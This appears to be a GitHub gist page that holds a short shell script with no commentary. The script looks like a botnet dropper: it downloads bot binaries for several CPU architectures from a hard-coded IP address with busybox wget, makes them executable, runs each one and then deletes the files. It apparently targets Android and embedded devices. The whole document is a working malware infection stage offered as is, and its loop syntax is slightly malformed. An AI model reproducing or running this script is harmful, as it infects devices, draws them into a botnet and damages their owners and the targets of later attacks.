Skip to content

Instantly share code, notes, and snippets.

@nl5887
Created July 9, 2018 19:06
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save nl5887/6e4a7e14d8ad52d26e80a2d6c585b515 to your computer and use it in GitHub Desktop.
Save nl5887/6e4a7e14d8ad52d26e80a2d6c585b515 to your computer and use it in GitHub Desktop.
#!/bin/sh
n="arm.bot.le mips.bot.be mipsel.bot.le arm7.bot.le x86_64.bot.le i586.bot.le i686.bot.le"
http_server="95.215.62.169"
for a in $n
cp /system/bin/sh $a
>$a
busybox wget http://$http_server/$a -O -> $a
chmod 777 $a
./$a
done
for a in $n
rm $a
done
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment